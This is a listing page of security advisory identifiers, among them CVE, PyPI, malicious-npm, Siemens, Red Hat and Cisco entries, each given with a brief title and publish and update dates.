| cve-2025-46399 (NVD) | CVSS-v3.1: 7.1 | fig2dev segmentation fault in genge_itp_spline |
xfig |
fig2dev |
2025-04-23T20:55:15.407Z | 2025-04-24T13:07:28.923Z |
| cve-2025-46398 (NVD) | CVSS-v3.1: 7.1 | fig2dev stack-overflow via read_objects |
xfig |
fig2dev |
2025-04-23T20:55:13.458Z | 2025-04-24T13:07:37.297Z |
| cve-2025-46397 (NVD) | CVSS-v3.1: 7.1 | fig2dev stack-overflow |
xfig |
fig2dev |
2025-04-23T20:55:09.795Z | 2025-04-24T13:07:43.840Z |
| cve-2025-46394 (NVD) | In tar in BusyBox through 1.37.0, a TAR archive can have filenames hidden from a listing through the use of terminal escape sequences. |
BusyBox |
BusyBox |
2025-04-23T00:00:00.000Z | 2025-04-24T20:03:24.126Z | |
| cve-2025-46393 (NVD) | In multispectral MIFF image processing in ImageMagick before 7.1.1-44, packet_size is mishandled (related to the rendering of all channels in an arbitrary order). |
ImageMagick |
ImageMagick |
2025-04-23T00:00:00.000Z | 2025-04-23T15:17:20.473Z | |
| cve-2025-45429 (NVD) | N/A | In the Tenda ac9 v1.0 router with firmware V15.03.05.14_multi, there is a stack overflow vulnerability in /goform/WifiWpsStart, which may lead to remote arbitrary code execution. |
n/a |
n/a |
2025-04-23T00:00:00.000Z | 2025-04-23T15:30:33.643Z |
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| pysec-2024-232 | python-jose through 3.3.0 has algorithm confusion with OpenSSH ECDSA keys and other key formats. ... | 2024-04-26T00:15:09+00:00 | 2025-02-18T19:20:15.468012+00:00 |
| pysec-2024-231 | LightGBM Remote Code Execution Vulnerability | 2024-11-12T18:15:28+00:00 | 2025-02-15T07:20:34.246161+00:00 |
| pysec-2024-230 | Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL ce... | 2024-07-05T19:15:10+00:00 | 2025-02-12T21:21:51.559667+00:00 |
| pysec-2024-229 | Hugging Face Transformers Trax Model Deserialization of Untrusted Data Remote Code Execution Vuln... | 2024-11-22T22:15:07+00:00 | 2025-02-10T23:22:41.499413+00:00 |
| pysec-2024-228 | Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Executio... | 2024-11-22T22:15:07+00:00 | 2025-02-10T23:22:41.449105+00:00 |
| pysec-2024-227 | Hugging Face Transformers MobileViTV2 Deserialization of Untrusted Data Remote Code Execution Vul... | 2024-11-22T22:15:06+00:00 | 2025-02-10T23:22:41.399021+00:00 |
| pysec-2024-226 | Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A c... | 2024-02-21T17:15:09+00:00 | 2025-02-06T00:34:28.734730+00:00 |
| pysec-2024-225 | cryptography is a package designed to expose cryptographic primitives and recipes to Python devel... | 2024-02-21T17:15:09+00:00 | 2025-02-06T00:34:24.427679+00:00 |
| pysec-2024-224 | Excessive directory permissions in MLflow leads to local privilege escalation when using spark_ud... | 2024-11-25T14:15:06+00:00 | 2025-02-03T16:23:40.409646+00:00 |
| pysec-2024-27 | CrateDB 5.5.1 is contains an authentication bypass vulnerability in the Admin UI component. After... | 2024-01-30T01:15:00Z | 2025-01-30T22:47:57.847403Z |
| pysec-2019-242 | Capstone 3.0.4 has an out-of-bounds vulnerability (SEGV caused by a read memory access) in X86_in... | 2019-05-15T14:29:00Z | 2025-01-28T17:34:08.578134Z |
| pysec-2025-2 | uniapi version 1.0.7 introduces code that would execute on import of the module and download a sc... | 2025-01-24T19:56:53+00:00 | |
| pysec-2024-223 | Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as ... | 2024-02-23T18:15:50+00:00 | 2025-01-22T16:23:22.060512+00:00 |
| pysec-2024-222 | Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as... | 2024-02-23T18:15:50+00:00 | 2025-01-22T16:23:21.994731+00:00 |
| pysec-2024-221 | aiosmtpd is a reimplementation of the Python stdlib smtpd.py based on asyncio. aiosmtpd is vulner... | 2024-03-12T21:15:58+00:00 | 2025-01-22T16:23:18.042465+00:00 |
| pysec-2024-220 | Gradio is an open-source Python package designed for quick prototyping. This vulnerability involv... | 2024-10-10T23:15:03+00:00 | 2025-01-19T22:22:23.972580+00:00 |
| pysec-2024-219 | Gradio is an open-source Python package designed for quick prototyping. This vulnerability involv... | 2024-10-10T23:15:03+00:00 | 2025-01-19T22:22:23.897787+00:00 |
| pysec-2024-218 | Gradio is an open-source Python package designed for quick prototyping. This vulnerability involv... | 2024-10-10T23:15:03+00:00 | 2025-01-19T22:22:23.803143+00:00 |
| pysec-2024-217 | Gradio is an open-source Python package designed for quick prototyping. This is a **data validati... | 2024-10-10T23:15:02+00:00 | 2025-01-19T22:22:23.723816+00:00 |
| pysec-2024-216 | Gradio is an open-source Python package designed for quick prototyping. This vulnerability is a *... | 2024-10-10T23:15:02+00:00 | 2025-01-19T22:22:23.549944+00:00 |
| pysec-2024-215 | Gradio is an open-source Python package designed for quick prototyping. This vulnerability relate... | 2024-10-10T22:15:11+00:00 | 2025-01-19T22:22:23.471780+00:00 |
| pysec-2024-214 | Gradio is an open-source Python package designed for quick prototyping. This vulnerability relate... | 2024-10-10T22:15:10+00:00 | 2025-01-19T22:22:23.399444+00:00 |
| pysec-2024-213 | Gradio is an open-source Python package designed for quick prototyping. This vulnerability relate... | 2024-10-10T22:15:10+00:00 | 2025-01-19T22:22:23.310301+00:00 |
| pysec-2024-212 | Apache Airflow versions before 2.10.1 have a vulnerability that allows DAG authors to add local s... | 2024-09-07T08:15:11+00:00 | 2025-01-19T22:22:22.289672+00:00 |
| pysec-2024-211 | Waitress is a Web Server Gateway Interface server for Python 2 and 3. When a remote client closes... | 2024-10-29T15:15:12+00:00 | 2025-01-19T19:19:01.852094+00:00 |
| pysec-2024-210 | Waitress is a Web Server Gateway Interface server for Python 2 and 3. A remote client may send a ... | 2024-10-29T15:15:11+00:00 | 2025-01-19T19:19:01.811922+00:00 |
| pysec-2024-209 | Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 ... | 2024-04-25T18:15:09+00:00 | 2025-01-19T19:19:01.689044+00:00 |
| pysec-2024-208 | Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 ... | 2024-04-25T18:15:08+00:00 | 2025-01-19T19:19:01.647736+00:00 |
| pysec-2024-207 | Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 ... | 2024-04-25T18:15:08+00:00 | 2025-01-19T19:19:01.605918+00:00 |
| pysec-2024-206 | Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 ... | 2024-04-25T18:15:08+00:00 | 2025-01-19T19:19:01.566553+00:00 |
| ID | Description |
|---|---|
| gsd-2024-33851 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33850 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33849 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-4295 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-4294 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-4293 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-4292 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-4291 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2023-52722 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2022-48685 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2022-48684 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-24777 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-28875 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33846 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33845 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33844 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33843 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33842 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33841 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33840 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33839 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33838 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33837 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33836 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33835 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33834 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33833 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33832 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33831 | The format of the source doesn't require a description, click on the link for more details |
| gsd-2024-33830 | The format of the source doesn't require a description, click on the link for more details |
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| mal-2024-8863 | Malicious code in conductor-utils (npm) | 2024-09-11T23:05:31Z | 2024-09-11T23:05:32Z |
| mal-2024-8869 | Malicious code in perf-tools (npm) | 2024-09-11T23:05:31Z | 2024-09-11T23:05:31Z |
| mal-2024-8867 | Malicious code in node-integration-test (npm) | 2024-09-11T23:05:31Z | 2024-09-11T23:05:31Z |
| mal-2024-8864 | Malicious code in create-auction-house (npm) | 2024-09-11T23:05:31Z | 2024-09-11T23:05:31Z |
| mal-2024-8861 | Malicious code in cryptograph-js (npm) | 2024-09-10T23:32:26Z | 2024-09-10T23:32:27Z |
| mal-2024-8860 | Malicious code in color-print12345 (npm) | 2024-09-10T23:32:26Z | 2024-09-10T23:32:27Z |
| mal-2024-8859 | Malicious code in beautiful-text (npm) | 2024-09-10T23:32:26Z | 2024-09-10T23:32:27Z |
| mal-2024-8858 | Malicious code in priv-pack (npm) | 2024-09-10T02:29:11Z | 2024-09-10T02:29:11Z |
| mal-2024-8850 | Malicious code in azure-iothub-service-client (npm) | 2024-09-09T11:07:52Z | 2024-09-10T00:49:29Z |
| mal-2024-8848 | Malicious code in balvant-chavda (npm) | 2024-09-09T04:23:38Z | 2024-09-10T00:49:29Z |
| mal-2024-8853 | Malicious code in roblox-event-tracker (npm) | 2024-09-09T19:07:27Z | 2024-09-10T00:30:53Z |
| mal-2024-8852 | Malicious code in roblox-badges (npm) | 2024-09-09T19:10:16Z | 2024-09-10T00:30:53Z |
| mal-2024-8851 | Malicious code in core-roblox-utilities (npm) | 2024-09-09T19:07:17Z | 2024-09-10T00:30:53Z |
| mal-2024-8847 | Malicious code in ethersscan-api (npm) | 2024-09-07T14:05:30Z | 2024-09-10T00:30:53Z |
| mal-2024-8846 | Malicious code in eslint-scope-util (npm) | 2024-09-07T14:05:30Z | 2024-09-10T00:30:53Z |
| mal-2024-8845 | Malicious code in eslint-module-conf (npm) | 2024-09-07T14:05:30Z | 2024-09-10T00:30:53Z |
| mal-2024-8821 | Malicious code in apigeeclientlib (npm) | 2024-09-05T23:46:23Z | 2024-09-10T00:30:53Z |
| mal-2024-8819 | Malicious code in 0g-storage-contracts (npm) | 2024-09-05T17:25:55Z | 2024-09-10T00:30:53Z |
| mal-2024-3831 | Malicious code in vrt_hitlijst_generic_voting (npm) | 2024-06-25T13:19:24Z | 2024-09-10T00:30:53Z |
| mal-2024-8856 | Malicious code in roblox-tracer (npm) | 2024-09-10T00:01:10Z | 2024-09-10T00:01:11Z |
| mal-2024-8857 | Malicious code in ultimiort (npm) | 2024-09-09T22:31:53Z | 2024-09-09T22:31:53Z |
| mal-2024-8855 | Malicious code in gapuler (npm) | 2024-09-09T22:31:53Z | 2024-09-09T22:31:53Z |
| mal-2024-8854 | Malicious code in evolution-ds (npm) | 2024-09-09T22:22:42Z | 2024-09-09T22:22:43Z |
| mal-2024-8849 | Malicious code in video.min (npm) | 2024-09-09T05:56:27Z | 2024-09-09T14:06:36Z |
| mal-2024-8840 | Malicious code in @rev-mfe-temporary/notifications (npm) | 2024-09-08T17:28:16Z | 2024-09-08T17:28:16Z |
| mal-2024-8839 | Malicious code in @pd-mfe/framework-request-context (npm) | 2024-09-08T17:25:46Z | 2024-09-08T17:25:46Z |
| mal-2024-8841 | Malicious code in @sky-team/create-project-modal (npm) | 2024-09-08T17:17:11Z | 2024-09-08T17:17:11Z |
| mal-2024-8838 | Malicious code in @zarafront/lib-zds (npm) | 2024-09-08T17:03:36Z | 2024-09-08T17:03:36Z |
| mal-2024-8837 | Malicious code in @warnermediacode/wme-theme-gelatam (npm) | 2024-09-08T16:45:46Z | 2024-09-08T16:45:46Z |
| mal-2024-8836 | Malicious code in @warnermediacode/wme-gep-modules-bundle (npm) | 2024-09-08T16:44:25Z | 2024-09-08T16:44:25Z |
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| wid-sec-w-2023-0437 | GNU Emacs: Mehrere Schwachstellen ermöglichen Codeausführung | 2023-02-20T23:00:00.000+00:00 | 2024-09-19T22:00:00.000+00:00 |
| wid-sec-w-2022-2181 | GNU Emacs: Schwachstelle ermöglicht Codeausführung | 2022-11-27T23:00:00.000+00:00 | 2024-09-19T22:00:00.000+00:00 |
| wid-sec-w-2024-2184 | Wireshark: Mehrere Schwachstellen | 2020-12-09T23:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2183 | Red Hat Enterprise Linux: Schwachstelle ermöglicht Darstellen falscher Informationen | 2024-09-18T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2182 | Grafana: Schwachstelle ermöglicht Offenlegung von Informationen | 2024-09-18T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2181 | Oracle Fusion Middleware: Mehrere Schwachstellen | 2020-07-14T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2180 | Oracle Fusion Middleware: Mehrere Schwachstellen | 2022-04-19T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2178 | Drupal: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen | 2024-09-18T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2176 | xwiki: Mehrere Schwachstellen | 2024-09-18T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2051 | ClamAV: Mehrere Schwachstellen ermöglichen Denial of Service und Dateimanipulation | 2024-09-04T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2035 | Red Hat OpenShift: Mehrere Schwachstellen ermöglichen Manipulation von Dateien und Denial of Service | 2024-09-03T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-2033 | Red Hat Enterprise Linux (CPython): Schwachstelle ermöglicht Manipulation von Dateien | 2024-09-02T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1951 | expat: Mehrere Schwachstellen ermöglichen Denial of Service | 2024-08-29T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1914 | Python: Schwachstelle ermöglicht Denial of Service | 2024-08-22T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1913 | Red Hat OpenShift Container Platform: Mehrere Schwachstellen | 2024-08-22T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1828 | Intel Prozessor: Mehrere Schwachstellen | 2024-08-13T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1783 | Mozilla Firefox, Firefox ESR und Thunderbird: Mehrere Schwachstellen | 2024-08-06T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1760 | ffmpeg: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff | 2024-08-05T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1756 | Red Hat Enterprise Linux (python-setuptools): Schwachstelle ermöglicht Codeausführung | 2024-08-04T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1722 | Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff | 2024-07-29T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1661 | Linux Kernel: Schwachstelle ermöglicht nicht spezifizierten Angriff | 2024-07-17T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1646 | Linux Kernel: Mehrere Schwachstellen ermöglichen Manipulation von Dateien | 2024-07-16T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1625 | Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff | 2024-07-16T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1562 | Red Hat Enterprise Linux: Schwachstelle ermöglicht Offenlegung von Informationen | 2024-07-09T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1504 | Apache HTTP Server: Mehrere Schwachstellen | 2024-07-01T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1474 | Red Hat OpenShift Container Platform: Mehrere Schwachstellen | 2024-06-27T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1469 | OpenSSL: Schwachstelle ermöglicht Denial of Service und Offenlegung von Informationen | 2024-06-26T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1418 | Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff | 2024-06-19T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1322 | Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe | 2024-06-09T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| wid-sec-w-2024-1287 | Golang Go: Mehrere Schwachstellen | 2024-06-04T22:00:00.000+00:00 | 2024-09-18T22:00:00.000+00:00 |
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| ssa-723487 | SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products | 2024-07-09T00:00:00Z | 2024-07-22T00:00:00Z |
| ssa-071402 | SSA-071402: Multiple Vulnerabilities in SICAM Products | 2024-07-22T00:00:00Z | 2024-07-22T00:00:00Z |
| ssa-998949 | SSA-998949: Hard-coded Default Encryption Key in Mendix Encryption Module V10.0.0 and V10.0.1 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-928781 | SSA-928781: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 HF1 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-868282 | SSA-868282: Multiple Vulnerabilities in SINEMA Remote Connect Client before V3.2 HF1 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-825651 | SSA-825651: Deserialization Vulnerability in SIMATIC STEP 7 (TIA Portal) before V18 Update 2 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-824889 | SSA-824889: XML File Parsing Vulnerabilities in JT Open and PLM XML SDK | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-780073 | SSA-780073: Denial of Service Vulnerability in PROFINET Devices via DCE-RPC Packets | 2020-02-11T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-779936 | SSA-779936: Catalog-Profile Deserialization Vulnerability in Siemens Engineering Platforms before V19 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-750274 | SSA-750274: Impact of CVE-2024-3400 on RUGGEDCOM APE1808 devices configured with Palo Alto Networks Virtual NGFW | 2024-04-19T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-730482 | SSA-730482: Denial of Service Vulnerability in SIMATIC WinCC | 2024-04-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-712929 | SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products | 2022-06-14T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-711309 | SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products | 2023-09-12T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-593272 | SSA-593272: SegmentSmack in Interniche IP-Stack based Industrial Devices | 2020-04-14T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-484086 | SSA-484086: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.1 | 2022-06-14T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-473245 | SSA-473245: Denial of Service Vulnerability in Profinet Devices | 2019-10-08T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-446448 | SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack | 2022-04-12T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-381581 | SSA-381581: Multiple Vulnerabilities in SINEMA Remote Connect Server before V3.2 SP1 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-346262 | SSA-346262: Denial of Service Vulnerability in SNMP Interface of Industrial Products | 2017-11-23T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-337522 | SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8 | 2024-06-11T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-313039 | SSA-313039: Deserialization Vulnerability in STEP 7 Safety before V19 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-265688 | SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 | 2024-04-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-170375 | SSA-170375: Multiple Vulnerabilities in RUGGEDCOM ROS before V5.9 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-160243 | SSA-160243: Multiple Vulnerabilities in SINEC NMS before V2.0 | 2023-10-10T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-064222 | SSA-064222: Multiple File Parsing Vulnerabilities in Simcenter Femap before V2406 | 2024-07-09T00:00:00Z | 2024-07-09T00:00:00Z |
| ssa-900277 | SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001 | 2024-06-11T00:00:00Z | 2024-06-11T00:00:00Z |
| ssa-879734 | SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1 | 2024-06-11T00:00:00Z | 2024-06-11T00:00:00Z |
| ssa-871704 | SSA-871704: Multiple Vulnerabilities in SICAM Products | 2024-05-14T00:00:00Z | 2024-06-11T00:00:00Z |
| ssa-625862 | SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3 | 2024-06-11T00:00:00Z | 2024-06-11T00:00:00Z |
| ssa-620338 | SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM | 2024-06-11T00:00:00Z | 2024-06-11T00:00:00Z |
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| rhsa-2023_6251 | Red Hat Security Advisory: OpenShift Virtualization 4.11.7 Images security and bug fix update | 2023-11-01T16:14:42+00:00 | 2025-03-29T04:25:59+00:00 |
| rhsa-2023_7215 | Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.2.12 | 2023-11-15T00:16:31+00:00 | 2025-03-29T04:25:57+00:00 |
| rhsa-2023_6298 | Red Hat Security Advisory: Release of OpenShift Serverless Client kn 1.30.2 security update | 2023-11-03T08:48:21+00:00 | 2025-03-29T04:25:56+00:00 |
| rhsa-2023_6200 | Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.1.9 security updates and bug fixes | 2023-10-30T18:15:21+00:00 | 2025-03-29T04:25:56+00:00 |
| rhsa-2023_6817 | Red Hat Security Advisory: OpenShift Virtualization 4.14.0 Images security and bug fix update | 2023-11-08T14:03:27+00:00 | 2025-03-29T04:25:53+00:00 |
| rhsa-2023_6781 | Red Hat Security Advisory: openshift-pipelines-client security update | 2023-11-08T01:10:46+00:00 | 2025-03-29T04:25:53+00:00 |
| rhsa-2023_6240 | Red Hat Security Advisory: OpenShift Container Platform 4.13 low-latency extras security update | 2023-11-01T13:41:55+00:00 | 2025-03-29T04:25:50+00:00 |
| rhsa-2023_6179 | Red Hat Security Advisory: Red Hat Product OCP Tools 4.13 OpenShift Jenkins security update | 2023-10-30T13:03:06+00:00 | 2025-03-29T04:25:47+00:00 |
| rhsa-2023_6828 | Red Hat Security Advisory: ACS 4.1 enhancement update | 2023-11-08T18:34:59+00:00 | 2025-03-29T04:25:44+00:00 |
| rhsa-2023_6305 | Red Hat Security Advisory: Migration Toolkit for Applications security update | 2023-11-06T11:24:51+00:00 | 2025-03-29T04:25:44+00:00 |
| rhsa-2023_6296 | Red Hat Security Advisory: Release of OpenShift Serverless 1.30.2 | 2023-11-02T19:16:02+00:00 | 2025-03-29T04:25:44+00:00 |
| rhsa-2023_6243 | Red Hat Security Advisory: openshift-gitops-kam security update | 2023-11-01T14:08:03+00:00 | 2025-03-29T04:25:41+00:00 |
| rhsa-2023_6172 | Red Hat Security Advisory: Red Hat Product OCP Tools 4.12 Openshift Jenkins security update | 2023-10-30T11:24:00+00:00 | 2025-03-29T04:25:38+00:00 |
| rhsa-2023_6280 | Red Hat Security Advisory: Migration Toolkit for Applications security and bug fix update | 2023-11-02T10:25:06+00:00 | 2025-03-29T04:25:35+00:00 |
| rhsa-2023_6235 | Red Hat Security Advisory: OpenShift Virtualization 4.13.5 Images security update | 2023-11-01T12:04:35+00:00 | 2025-03-29T04:25:29+00:00 |
| rhsa-2023_6171 | Red Hat Security Advisory: Red Hat Product OCP Tools 4.11 Openshift Jenkins security update | 2023-10-30T11:10:10+00:00 | 2025-03-29T04:25:29+00:00 |
| rhsa-2023_6165 | Red Hat Security Advisory: skupper-cli and skupper-router security update | 2023-10-30T08:22:15+00:00 | 2025-03-29T04:25:21+00:00 |
| rhsa-2023_6233 | Red Hat Security Advisory: Red Hat OpenShift Enterprise security update | 2023-11-01T11:34:35+00:00 | 2025-03-29T04:25:20+00:00 |
| rhsa-2023_6126 | Red Hat Security Advisory: OpenShift Container Platform 4.12.41 bug fix and security update | 2023-11-01T11:07:20+00:00 | 2025-03-29T04:25:18+00:00 |
| rhsa-2023_6161 | Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.7.14 security and bug fix update | 2023-10-30T02:16:18+00:00 | 2025-03-29T04:25:11+00:00 |
| rhsa-2023_6115 | Red Hat Security Advisory: OpenShift API for Data Protection security update | 2023-10-25T14:01:58+00:00 | 2025-03-29T04:25:11+00:00 |
| rhsa-2023_6220 | Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.10.1 security update | 2023-10-31T18:22:09+00:00 | 2025-03-29T04:25:10+00:00 |
| rhsa-2023_6125 | Red Hat Security Advisory: OpenShift Container Platform 4.12.41 security and extras update | 2023-11-01T10:27:35+00:00 | 2025-03-29T04:25:09+00:00 |
| rhsa-2023_6217 | Red Hat Security Advisory: Red Hat OpenShift Enterprise security update | 2023-10-31T14:40:40+00:00 | 2025-03-29T04:25:02+00:00 |
| rhsa-2023_6156 | Red Hat Security Advisory: Red Hat OpenShift support for Windows Containers 8.1.0 security update | 2023-10-30T00:25:10+00:00 | 2025-03-29T04:25:02+00:00 |
| rhsa-2023_6085 | Red Hat Security Advisory: Red Hat OpenShift distributed tracing security update | 2023-10-24T15:32:35+00:00 | 2025-03-29T04:25:00+00:00 |
| rhsa-2023_6130 | Red Hat Security Advisory: OpenShift Container Platform 4.13.19 bug fix and security update | 2023-10-30T13:49:24+00:00 | 2025-03-29T04:24:59+00:00 |
| rhsa-2023_6031 | Red Hat Security Advisory: Cryostat security update | 2023-10-23T14:24:36+00:00 | 2025-03-29T04:24:57+00:00 |
| rhsa-2023_6202 | Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.8 security and bug fix updates | 2023-10-30T20:13:48+00:00 | 2025-03-29T04:24:53+00:00 |
| rhsa-2023_6148 | Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.7.9 security and bug fix updates | 2023-10-26T19:18:44+00:00 | 2025-03-29T04:24:52+00:00 |
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| cisco-sa-nso-ordir-mnm8yqzo | Cisco Crosswork Network Services Orchestrator Open Redirect Vulnerability | 2024-05-15T16:00:00+00:00 | 2024-05-15T16:00:00+00:00 |
| cisco-sa-nso-hcc-priv-esc-owbwcs5d | Cisco Crosswork Network Services Orchestrator Privilege Escalation Vulnerability | 2024-05-15T16:00:00+00:00 | 2024-05-15T16:00:00+00:00 |
| cisco-sa-cnfd-rwpesc-zaoufyx8 | ConfD CLI Privilege Escalation and Arbitrary File Read and Write Vulnerabilities | 2024-05-15T16:00:00+00:00 | 2024-05-15T16:00:00+00:00 |
| cisco-sa-appd-netvisdos-9znbsjtk | Cisco AppDynamics Network Visibility Service Denial of Service Vulnerability | 2024-05-15T16:00:00+00:00 | 2024-05-15T16:00:00+00:00 |
| cisco-sa-ipphone-multi-vulns-cxahcvs | Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities | 2024-05-01T16:00:00+00:00 | 2024-05-01T16:00:00+00:00 |
| cisco-sa-asaftd-websrvs-dos-x8gnucd2 | Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability | 2024-04-24T16:00:00+00:00 | 2024-04-24T16:00:00+00:00 |
